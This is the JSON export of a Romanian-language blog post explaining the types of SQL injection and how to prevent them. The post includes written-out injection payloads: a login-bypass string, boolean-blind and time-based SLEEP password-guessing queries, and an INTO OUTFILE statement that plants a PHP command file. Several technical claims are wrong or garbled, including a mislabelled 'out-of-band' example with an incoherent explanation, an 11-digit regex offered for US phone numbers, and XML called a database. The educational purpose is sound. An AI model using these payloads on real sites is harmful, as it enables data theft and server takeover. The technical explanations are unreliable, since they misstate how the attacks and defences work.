{"id":505,"date":"2022-08-06T22:53:54","date_gmt":"2022-08-06T22:53:54","guid":{"rendered":"https:\/\/securitybriefing.net\/?p=505"},"modified":"2022-08-06T22:53:54","modified_gmt":"2022-08-06T22:53:54","slug":"sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile","status":"publish","type":"post","link":"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/","title":{"rendered":"SQL Injection 101: Ce este SQLi \u0219i cum s\u0103 preveni\u021bi atacurile"},"content":{"rendered":"

Ce este injec\u021bia SQL<\/strong><\/h2>\n\n\n

Injec\u021bia SQL (SQLi) este un tip de atac care permite infractorilor s\u0103 execute declara\u021bii SQL mali\u021bioase \u00eempotriva aplica\u021biilor web vulnerabile. Atacatorii pot accesa date sensibile, cum ar fi informa\u021biile despre clien\u021bi, datele personale, secretele comerciale \u0219i altele, prin ocolirea m\u0103surilor de securitate ale aplica\u021biei. Aici vom discuta despre injec\u021bia SQL, cum func\u021bioneaz\u0103 \u0219i cum pute\u021bi preveni atacurile.<\/p>\n\n\n\n

Atacurile de injec\u021bie SQL pot avea loc pe orice site web care folose\u0219te o baz\u0103 de date SQL. Acest tip de atac permite atacatorilor s\u0103 ob\u021bin\u0103 acces la datele dvs. esen\u021biale. Ei pot vedea informa\u021bii despre consumatori, date personale, secrete comerciale \u0219i proprietate intelectual\u0103. Acesta este unul dintre cele mai grave tipuri de atacuri asupra aplica\u021biilor web, conform OWASP.<\/p>\n\n\n

Tipuri de injec\u021bie SQL<\/strong><\/h2>\n\n\n
\"Tipuri<\/figure>\n\n\n

SQLi \u00een band\u0103<\/strong><\/h3>\n\n\n

Injec\u021bia SQL \u00een band\u0103 este un atac \u00een care atacatorul folose\u0219te acela\u0219i canal pentru a trimite \u0219i a primi interog\u0103ri. \u00cen band\u0103 \u00eenseamn\u0103 c\u0103 r\u0103spunsul este ob\u021binut folosind acela\u0219i mediu de comunica\u021bie. Scopul atacatorului este de a ob\u021bine r\u0103spunsul \u00eentr-un browser web imediat, dac\u0103 este posibil, atunci c\u00e2nd efectueaz\u0103 atacul manual cu un browser web.<\/p>\n\n\n\n

Exemplu de injec\u021bie SQL \u00een band\u0103<\/strong><\/p>\n\n\n\n

Cea mai comun\u0103 modalitate pentru un atacator de a face o injec\u021bie SQL \u00een band\u0103 este s\u0103 schimbe cererea astfel \u00eenc\u00e2t s\u0103 poat\u0103 vedea informa\u021biile personale ale utilizatorului curent. Acest lucru se poate face prin schimbarea valorii trimise ca parte a cererii. De exemplu, dac\u0103 declara\u021bia trebuia s\u0103 afi\u0219eze numele utilizatorului, atacatorul ar putea s\u0103 o schimbe astfel \u00eenc\u00e2t s\u0103 fie afi\u0219at numele s\u0103u \u00een schimb.<\/p>\n\n\n\n

SELECT * FROM users WHERE user_id LIKE 'utilizator_curent'<\/pre>\n\n\n\n
SQLi bazat pe erori \u0219i SQLi bazat pe unire sunt cele dou\u0103 forme cele mai frecvente de injec\u021bie SQL \u00een band\u0103.<\/p>\n\n\n
SQLi bazat pe erori<\/strong><\/h4>\n\n\n
O tehnic\u0103 SQLi bazat\u0103 pe erori este o abordare de injec\u021bie SQL \u00een band\u0103 care profit\u0103 de mesajele de eroare ale serverului de baze de date pentru a descoperi arhitectura bazei de date. Injec\u021bia SQL bazat\u0103 pe erori este cel mai comun tip de injec\u021bie SQL \u00een band\u0103.<\/p>\n\n\n\n
Exemplu de SQLi bazat pe erori:<\/strong><\/p>\n\n\n\n
Dac\u0103 un atacator \u00eencearc\u0103 s\u0103 se autentifice cu urm\u0103toarele date:<\/p>\n\n\n\n
nume_utilizator: ' OR 'a'='aparol\u0103: orice<\/pre>\n\n\n\n
Baza de date va returna o eroare deoarece declara\u021bia este sintactic incorect\u0103. Mesajul de eroare va dezv\u0103lui informa\u021bii despre baza de date, pe care atacatorul le poate folosi \u00een avantajul s\u0103u.<\/p>\n\n\n
SQLi bazat pe unire:<\/strong><\/h4>\n\n\n
Injec\u021bia SQL \u00een band\u0103 este o modalitate de a ob\u021bine informa\u021bii de pe un site web folosind operatorul UNION pentru a combina rezultatele a dou\u0103 sau mai multe declara\u021bii SELECT.<\/p>\n\n\n
Injec\u021bie SQL oarb\u0103<\/strong><\/h3>\n\n\n
Injec\u021bia SQL oarb\u0103 este un atac \u00een care atacatorul \u00eencearc\u0103 s\u0103 ob\u021bin\u0103 r\u0103spunsuri de la baza de date pun\u00e2nd \u00eentreb\u0103ri care vor rezulta \u00eentr-un r\u0103spuns adev\u0103rat sau fals. Atacatorul folose\u0219te mesajele de eroare pentru a vedea dac\u0103 aplica\u021bia r\u0103spunde diferit atunci c\u00e2nd este folosit un cod specific.<\/p>\n\n\n\n
C\u00e2nd un hacker folose\u0219te injec\u021bia SQL, aplica\u021bia web ar putea afi\u0219a mesaje critice de avertizare ale bazei de date care indic\u0103 faptul c\u0103 sintaxa interog\u0103rii SQL este incorect\u0103. Injec\u021bia SQL oarb\u0103 func\u021bioneaz\u0103 la fel ca injec\u021bia SQL tradi\u021bional\u0103, cu excep\u021bia modului \u00een care datele sunt ob\u021binute din baza de date. Dac\u0103 o baz\u0103 de date nu are suficiente informa\u021bii pentru ca un atacator s\u0103 le exploateze, un atacator trebuie s\u0103 pun\u0103 o serie de \u00eentreb\u0103ri pentru a ob\u021bine date.<\/p>\n\n\n\n
Injec\u021bia SQL oarb\u0103 este \u00eemp\u0103r\u021bit\u0103 \u00een SQLi orb bazat pe boolean \u0219i SQLi orb bazat pe timp.<\/p>\n\n\n
SQLi orb bazat pe boolean<\/strong><\/h4>\n\n\n
Injec\u021bia SQL oarb\u0103 bazat\u0103 pe boolean este un atac \u00een care atacatorul \u00eencearc\u0103 s\u0103 ob\u021bin\u0103 r\u0103spunsuri de la baza de date pun\u00e2nd \u00eentreb\u0103ri care vor rezulta \u00eentr-un r\u0103spuns adev\u0103rat sau fals. Atacatorul folose\u0219te mesajele de eroare pentru a vedea dac\u0103 aplica\u021bia r\u0103spunde diferit atunci c\u00e2nd este folosit un cod specific.<\/p>\n\n\n\n
Exemplu de SQLi orb bazat pe boolean:<\/p>\n\n\n\n
Dac\u0103 un atacator dore\u0219te s\u0103 afle tipul bazei de date, va folosi urm\u0103toarea declara\u021bie:<\/p>\n\n\n\n
SELECT * FROM users WHERE user_id LIKE 'utilizator_curent' and database() like '%tip%'<\/pre>\n\n\n\n
Dac\u0103 baza de date este MySQL, rezultatul ar fi ceva de genul acesta:<\/p>\n\n\n\n
Ave\u021bi o eroare \u00een sintaxa SQL; verifica\u021bi manualul care corespunde versiunii serverului MySQL pentru sintaxa corect\u0103 de utilizat l\u00e2ng\u0103 \u2018and database() like \u2018%type%\u201d la linia<\/p>\n\n\n
Injec\u021bie SQL oarb\u0103 bazat\u0103 pe timp<\/strong><\/h4>\n\n\n
Un atac orb bazat pe timp este atunci c\u00e2nd o comand\u0103 SQL este trimis\u0103 serverului cu un cod care face ca interog\u0103rile s\u0103 se execute mai lent.<\/p>\n\n\n\n
Atacurile oarbe bazate pe timp permit atacatorilor s\u0103 extrag\u0103 date pe baza timpului de acces. Un astfel de atac este cunoscut ca un atac de injec\u021bie orb sau inferen\u021bial. Acesta este un tip de atac \u00een care nu exist\u0103 flux de date \u00eentre atacator \u0219i baza de date, dar pentru c\u0103 nu exist\u0103 un r\u0103spuns, este cunoscut \u0219i ca un atac de injec\u021bie orb.<\/p>\n\n\n\n
Timpul de r\u0103spuns indic\u0103 dac\u0103 r\u0103spunsul este corect sau incorect. Dac\u0103 r\u0103spunsul este negativ, intrusul va face o alt\u0103 cerere. Aceast\u0103 tehnic\u0103 de atac este lent\u0103 deoarece hackerul trebuie s\u0103 treac\u0103 prin fiecare caracter individual, mai ales atunci c\u00e2nd atac\u0103 baze de date masive.<\/p>\n\n\n\n
Exemplu de SQLi orb<\/strong><\/p>\n\n\n\n
\u00cen acest exemplu, atacatorul \u00eencearc\u0103 s\u0103 determine dac\u0103 utilizatorul cu id=999 exist\u0103 \u00een baza de date. Pentru a face acest lucru, folose\u0219te urm\u0103toarea declara\u021bie:<\/p>\n\n\n\n
IF(SUBSTRING((SELECT password FROM users WHERE user_id=999),0, LEN('secret'))='secret', SLEEP(30), 'fals')<\/pre>\n\n\n\n
Dac\u0103 utilizatorul cu id 999 exist\u0103 \u00een baza de date \u0219i parola sa este secret\u0103, atunci aplica\u021bia va dormi timp de 30 de secunde. Aplica\u021bia va returna fals dac\u0103 utilizatorul nu exist\u0103 \u00een baza de date.<\/p>\n\n\n
SQLi \u00een afara benzii<\/strong><\/h3>\n\n\n
Cineva care dore\u0219te s\u0103 fure date poate trimite cod SQL unui server de baze de date \u00eentr-un mod care nu face parte din comunicarea obi\u0219nuit\u0103 \u00eentre server \u0219i alte calculatoare. Acest lucru se poate face trimi\u021b\u00e2nd informa\u021bii c\u0103tre server prin cereri DNS sau HTTP.<\/p>\n\n\n\n
R\u0103spunsul aplica\u021biei nu va fi afectat de faptul c\u0103 datele sunt sau nu returnate, dac\u0103 exist\u0103 sau nu o problem\u0103 cu baza de date sau c\u00e2t timp dureaz\u0103 executarea interog\u0103rii. \u00cen afara benzii poate fi folosit \u00een interac\u021biunile de re\u021bea pentru a declan\u0219a evenimente dup\u0103 bunul plac. \u00cen func\u021bie de o condi\u021bie injectat\u0103, acestea pot fi activate condi\u021bionat pentru a ob\u021bine cuno\u0219tin\u021be un bit la un moment dat.<\/p>\n\n\n\n
Datele pot, de asemenea, s\u0103 se scurg\u0103 prin mai multe protocoale de re\u021bea din interac\u021biunile de re\u021bea. Vizualul reprezint\u0103 cererea trimis\u0103 de aplica\u021bia web c\u0103tre baza de date a aplica\u021biei.<\/p>\n\n\n\n
Exemplu de SQLi \u00een afara benzii<\/strong><\/p>\n\n\n\n
\u00cen acest exemplu, atacatorul \u00eencearc\u0103 s\u0103 determine dac\u0103 un utilizator specific exist\u0103 \u00een baza de date. Pentru a face acest lucru, folose\u0219te urm\u0103toarea declara\u021bie:<\/p>\n\n\n\n
SELECT user_id FROM users WHERE username='$username' AND password='$password' LIMIT 0,0 UNION SELECT NULL,'' INTO OUTFILE '\/var\/opt\/databases\/$filename.php'; --<\/pre>\n\n\n\n
Aplica\u021bia va returna ID-ul utilizatorului dac\u0103 utilizatorul exist\u0103 \u00een baza de date. Dac\u0103 utilizatorul nu exist\u0103 \u00een baza de date, atunci aplica\u021bia va crea un fi\u0219ier care con\u021bine cod PHP care poate fi folosit pentru a executa comenzi de sistem. Atacatorul poate apoi s\u0103 foloseasc\u0103 acest fi\u0219ier pentru a rula comenzi pe server.<\/p>\n\n\n
Cum s\u0103 preveni\u021bi o injec\u021bie SQL<\/strong><\/h2>\n\n\n
Cea mai bun\u0103 modalitate de a v\u0103 proteja \u00eempotriva atacurilor de injec\u021bie SQL este s\u0103 folosi\u021bi validarea intr\u0103rilor, declara\u021bii preg\u0103tite \u0219i interog\u0103ri parametrizate. Codul nu ar trebui s\u0103 foloseasc\u0103 niciodat\u0103 direct intr\u0103rile utilizatorului. Dezvoltatorii trebuie s\u0103 igienizeze toate intr\u0103rile, nu doar intr\u0103rile din formularele web, cum ar fi formularele de autentificare. Ghiliemele simple ar trebui eliminate din orice componente de cod suspecte. De asemenea, este o idee bun\u0103 s\u0103 ascunde\u021bi problemele bazei de date pe site-urile live pentru a evita dezv\u0103luirea lor accidental\u0103. Injec\u021bia SQL poate oferi informa\u021bii despre un sistem de baze de date pe care atacatorii le pot folosi \u00een avantajul lor.<\/p>\n\n\n\n
Dac\u0103 g\u0103si\u021bi o problem\u0103 cu site-ul dvs., ar trebui s\u0103-l scoate\u021bi offline imediat \u0219i s\u0103 contacta\u021bi furnizorul dvs. de hosting. Ei v\u0103 pot ajuta s\u0103 determina\u021bi dac\u0103 site-ul dvs. a fost compromis \u0219i ce pa\u0219i trebuie s\u0103 face\u021bi pentru a rezolva problema. \u00centre timp, asigura\u021bi-v\u0103 c\u0103 to\u021bi utilizatorii site-ului dvs. sunt con\u0219tien\u021bi de problem\u0103 \u0219i \u00ee\u0219i schimb\u0103 parolele c\u00e2t mai cur\u00e2nd posibil.<\/p>\n\n\n
Sfaturi de prevenire pentru evitarea injec\u021biilor SQL<\/strong><\/h2>\n\n\n
Exist\u0103 c\u00e2teva modalit\u0103\u021bi de a evita vulnerabilit\u0103\u021bile de injec\u021bie SQL \u00een limbajul dvs. de programare \u0219i configurarea bazei de date. Aceste tehnici pot fi folosite cu majoritatea bazelor de date, cum ar fi XML. Pute\u021bi folosi aceste tehnici pentru a face bazele dvs. de date mai sigure.<\/p>\n\n\n
1) Utilizarea Procedurilor Stocate Corect Construite<\/h3>\n\n\n
\u00cencep\u0103torii ar trebui s\u0103 \u00eenceap\u0103 prin a \u00eenv\u0103\u021ba cum s\u0103 creeze declara\u021bii cu variabile. Acest lucru este mai u\u0219or dec\u00e2t crearea de interog\u0103ri dinamice \u0219i este mai u\u0219or de \u00een\u021beles. Interog\u0103rile parametrizate sunt acolo unde dezvoltatorul creeaz\u0103 tot codul SQL \u0219i apoi furnizeaz\u0103 fiecare parametru la o dat\u0103 ulterioar\u0103. Aceast\u0103 metod\u0103 permite bazei de date s\u0103 identifice \u00eentre codul surs\u0103 \u0219i informa\u021bii.<\/p>\n\n\n\n
Declara\u021biile preg\u0103tite ajut\u0103 la asigurarea c\u0103 scopul unei interog\u0103ri nu este schimbat, chiar dac\u0103 cineva \u00eencearc\u0103 s\u0103 ofere instruc\u021biuni SQL.<\/p>\n\n\n
2) Validarea Intr\u0103rilor pe Lista Alb\u0103<\/h3>\n\n\n
Interog\u0103rile SQL folosesc variabile de legare \u00een locuri specifice pentru date. De exemplu, dac\u0103 folosi\u021bi Python, a\u021bi folosi %s<\/strong> un substituent. Pute\u021bi folosi o expresie regulat\u0103 pentru a valida intrarea utilizatorului \u00een raport cu lista alb\u0103 pentru ce caractere sunt permise \u00een fiecare variabil\u0103 de legare.<\/p>\n\n\n\n
Dac\u0103 folosi\u021bi JavaScript, pute\u021bi folosi \\w<\/strong> pentru a potrivi caractere alfanumerice \u0219i caractere de subliniere.<\/p>\n\n\n\n
Lista alb\u0103 ar trebui s\u0103 fie c\u00e2t mai specific\u0103 posibil pentru a evita pozitivele false.<\/p>\n\n\n\n
De exemplu, dac\u0103 c\u0103uta\u021bi un num\u0103r de telefon din SUA, a\u021bi folosi urm\u0103toarea expresie regulat\u0103:<\/p>\n\n\n\n
\/^\\d{11}$\/<\/pre>\n\n\n\n
Aceasta ar potrivi un \u0219ir de 11 cifre care ar putea fi un num\u0103r de telefon. Dac\u0103 cineva ar \u00eencerca s\u0103 trimit\u0103 ceva de genul \u2018abcdef<\/strong>\u2018, nu s-ar potrivi \u0219i intrarea ar fi invalid\u0103.<\/p>\n\n\n\n
Acest lucru va ajuta s\u0103 v\u0103 asigura\u021bi c\u0103 datele dvs. sunt sigure \u0219i s\u0103n\u0103toase. Dac\u0103 trebuie s\u0103 folosi\u021bi valori din cod \u00een loc de parametri de utilizator, este \u0219i asta \u00een regul\u0103!<\/p>\n\n\n\n
Totu\u0219i, dac\u0103 valorile parametrilor utilizatorului vizeaz\u0103 nume specifice de tabele \u0219i coloane, atunci valorile parametrilor ar trebui s\u0103 fie mapate la numele corespunz\u0103toare de tabele \u0219i coloane pentru a asigura c\u0103 intrarea nevalidat\u0103 a utilizatorului nu intr\u0103 \u00een interogare.<\/p>\n\n\n
3) Utiliza\u021bi liste albe<\/h3>\n\n\n
Nu filtra\u021bi intr\u0103rile utilizatorului pe baza listelor negre de caractere rele. Utilizarea listelor albe de caractere bune care sunt a\u0219teptate \u00een c\u00e2mpuri specifice este mult mai eficient\u0103. Acest lucru va opri atacurile de injec\u021bie SQL \u00eenainte de a \u00eencepe.<\/p>\n\n\n\n
De exemplu, permite\u021bi doar cifre \u0219i cratime \u00een c\u00e2mpul de intrare dac\u0103 a\u0219tepta\u021bi un num\u0103r de telefon. Dac\u0103 a\u0219tepta\u021bi o adres\u0103 de e-mail, permite\u021bi doar caractere care sunt valabile \u00eentr-o adres\u0103 de e-mail.<\/p>\n\n\n
4) Utiliza\u021bi cele mai actualizate platforme<\/h3>\n\n\n
PHP nu are protec\u021bie SQLi \u00een platformele mai vechi de dezvoltare web. Folosi\u021bi cea mai actualizat\u0103 edi\u021bie a mediului de programare, a limbajului \u0219i a tehnologiilor asociate disponibile. \u00cen loc de PHP, folosi\u021bi PDO \u00een acest exemplu.<\/p>\n\n\n
5) Scana\u021bi-v\u0103 aplica\u021bia web regulat<\/h3>\n\n\n
Injec\u021biile SQL pot fi foarte greu de observat. Este important s\u0103 scana\u021bi aplica\u021bia web pentru vulnerabilit\u0103\u021bi \u00een mod regulat.<\/p>\n\n\n
6) Aplicarea principiului privilegiului minim<\/h3>\n\n\n
Principiul privilegiului minim este un concept de securitate care restric\u021bioneaz\u0103 utilizatorii la cantitatea minim\u0103 de acces de care au nevoie pentru a-\u0219i face treaba. Acest lucru include limitarea num\u0103rului de conturi pe care utilizatorii le au \u0219i privilegiile pe care le au acele conturi.<\/p>\n\n\n\n
Restric\u021bia minim\u0103 a func\u021bionalit\u0103\u021bii (LRF) este practica \u0219i conceptul de a restric\u021biona drepturile utilizatorului, conturile \u0219i procesele de calcul la doar acele resurse necesare pentru sarcini de baz\u0103, acceptabile. Acest lucru ajut\u0103 la men\u021binerea drepturilor minime ale utilizatorului sau a nivelurilor de autorizare, ceea ce este vital pentru ca oamenii s\u0103-\u0219i fac\u0103 treaba eficient.<\/p>\n\n\n\n
Privilegiul minim este un principiu de securitate care necesit\u0103 ca aplica\u021biile, sistemele \u0219i dispozitivele s\u0103 aib\u0103 doar permisiunile necesare pentru a \u00eendeplini o sarcin\u0103 specific\u0103. \u00cen acest fel, impactul va fi limitat dac\u0103 cineva reu\u0219e\u0219te s\u0103 exploateze o vulnerabilitate \u0219i s\u0103 fac\u0103 daune. Acest lucru este \u00een contrast cu oferirea utilizatorilor mai multe permisiuni dec\u00e2t au nevoie, ceea ce cre\u0219te riscul de daune semnificative \u00eentr-un atac SQL.<\/p>\n\n\n
Injec\u021bie SQL \u2013 \u00centreb\u0103ri frecvente<\/strong><\/h2>\n\n\n
\u00a0<\/div><\/div>\n\n\n\n
\n
Care este cea mai comun\u0103 injec\u021bie SQL?<\/strong>\n
Injec\u021bia SQL \u00een band\u0103 este cel mai comun tip de atac de injec\u021bie SQL. Apare atunci c\u00e2nd un atacator poate folosi acela\u0219i canal de comunicare pentru a livra sarcina util\u0103 \u0219i a colecta rezultatele.<\/p>\n<\/div>\n
Care este cea mai bun\u0103 ap\u0103rare \u00eempotriva injec\u021biei SQL?<\/strong>\n
Cea mai bun\u0103 ap\u0103rare \u00eempotriva injec\u021biei SQL este utilizarea interog\u0103rilor parametrizate. Acest tip de interogare folose\u0219te valori de substituent pentru parametri, care sunt furnizate ulterior. Aceast\u0103 metod\u0103 permite bazei de date s\u0103 fac\u0103 diferen\u021ba \u00eentre codul surs\u0103 \u0219i informa\u021bii.<\/p>\n<\/div>\n
Cum este detectat\u0103 injec\u021bia SQL?<\/strong>\n
Injec\u021bia SQL poate fi detectat\u0103 \u00een mai multe moduri. O metod\u0103 este utilizarea unui firewall pentru aplica\u021bii web (WAF). Un WAF este un dispozitiv hardware sau software care se afl\u0103 \u00eentre o aplica\u021bie web \u0219i internet. Acesta inspecteaz\u0103 traficul pentru activit\u0103\u021bi mali\u021bioase \u0219i poate bloca atacurile de injec\u021bie SQL.<\/p>\n<\/div>\n
Ce este injec\u021bia SQL de ordinul doi?<\/strong>\n
Injec\u021bia SQL de ordinul doi apare atunci c\u00e2nd un atacator poate injecta o sarcin\u0103 util\u0103 care este stocat\u0103 de aplica\u021bia web \u0219i apoi executat\u0103 ulterior. Acest tip de atac este mai dificil de realizat deoarece atacatorul trebuie s\u0103 aib\u0103 o modalitate de a declan\u0219a execu\u021bia sarcinii utile stocate.<\/p>\n<\/div>\n
Ce este injec\u021bia SQL oarb\u0103?<\/strong>\n
Injec\u021bia SQL oarb\u0103 este un atac \u00een care atacatorul nu vede direct rezultatele \u00eenc\u0103rc\u0103turii lor. \u00cen schimb, trebuie s\u0103 foloseasc\u0103 afirma\u021bii adev\u0103rate sau false pentru a deduce informa\u021bii din baza de date. Acest tip de atac este mai dificil de executat, dar poate fi la fel de periculos ca \u0219i alte tipuri de injec\u021bie SQL.<\/p>\n<\/div>\n
Ce este o interogare stivuit\u0103?<\/strong>\n
O interogare stivuit\u0103 este un tip de injec\u021bie SQL \u00een care atacatorul folose\u0219te mai multe interog\u0103ri pentru a extrage informa\u021bii din baza de date. Acest tip de atac este mai dificil de executat, dar poate fi foarte periculos dac\u0103 reu\u0219e\u0219te.<\/p>\n<\/div>\n
Ce este un SQL injection bazat pe erori?<\/strong>\n
Injec\u021bia SQL bazat\u0103 pe erori este un atac \u00een care atacatorul folose\u0219te erorile bazei de date pentru a deduce informa\u021bii din baza de date. Acest atac este mai dificil de executat, dar poate fi foarte periculos dac\u0103 reu\u0219e\u0219te.<\/p>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"
Ce este injec\u021bia SQL Injec\u021bia SQL (SQLi) este un tip de atac care permite infractorilor s\u0103 execute instruc\u021biuni SQL mali\u021bioase \u00eempotriva aplica\u021biilor web vulnerabile. Atacatorii pot accesa date sensibile, cum ar fi... Continue reading SQL Injection 101: Ce este SQLi \u0219i cum s\u0103 preveni\u021bi atacurile<\/span><\/a><\/p>","protected":false},"author":1,"featured_media":644,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27],"tags":[],"class_list":["post-505","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security","entry"],"yoast_head":"\nWhat is SQLi and How to Prevent Attacks | securitybriefing<\/title>\n<meta name=\"description\" content=\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/\" \/>\n<meta property=\"og:locale\" content=\"ro_RO\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"What is SQLi and How to Prevent Attacks | securitybriefing\" \/>\n<meta property=\"og:description\" content=\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/\" \/>\n<meta property=\"og:site_name\" content=\"Security Briefing\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-06T22:53:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\" \/>\n\t<meta property=\"og:image:width\" content=\"558\" \/>\n\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"security\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scris de\" \/>\n\t<meta name=\"twitter:data1\" content=\"security\" \/>\n\t<meta name=\"twitter:label2\" content=\"Timp estimat pentru citire\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"author\":{\"name\":\"security\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81\"},\"headline\":\"SQL Injection 101: What is SQLi and How to Prevent Attacks\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"},\"wordCount\":2130,\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"articleSection\":[\"Security\"],\"inLanguage\":\"ro-RO\"},{\"@type\":[\"WebPage\",\"FAQPage\"],\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\",\"name\":\"What is SQLi and How to Prevent Attacks | securitybriefing\",\"isPartOf\":{\"@id\":\"https:\/\/securitybriefing.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"datePublished\":\"2022-08-06T22:53:54+00:00\",\"description\":\"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.\",\"breadcrumb\":{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\"},\"mainEntity\":[{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\"},{\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\"}],\"inLanguage\":\"ro-RO\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png\",\"width\":558,\"height\":500,\"caption\":\"sql injection\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/securitybriefing.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SQL Injection 101: What is SQLi and How to Prevent Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/securitybriefing.net\/#website\",\"url\":\"https:\/\/securitybriefing.net\/\",\"name\":\"Security Briefing\",\"description\":\"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.\",\"publisher\":{\"@id\":\"https:\/\/securitybriefing.net\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/securitybriefing.net\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ro-RO\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/securitybriefing.net\/#organization\",\"name\":\"Security Briefing\",\"url\":\"https:\/\/securitybriefing.net\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ro-RO\",\"@id\":\"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"contentUrl\":\"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png\",\"width\":256,\"height\":70,\"caption\":\"Security 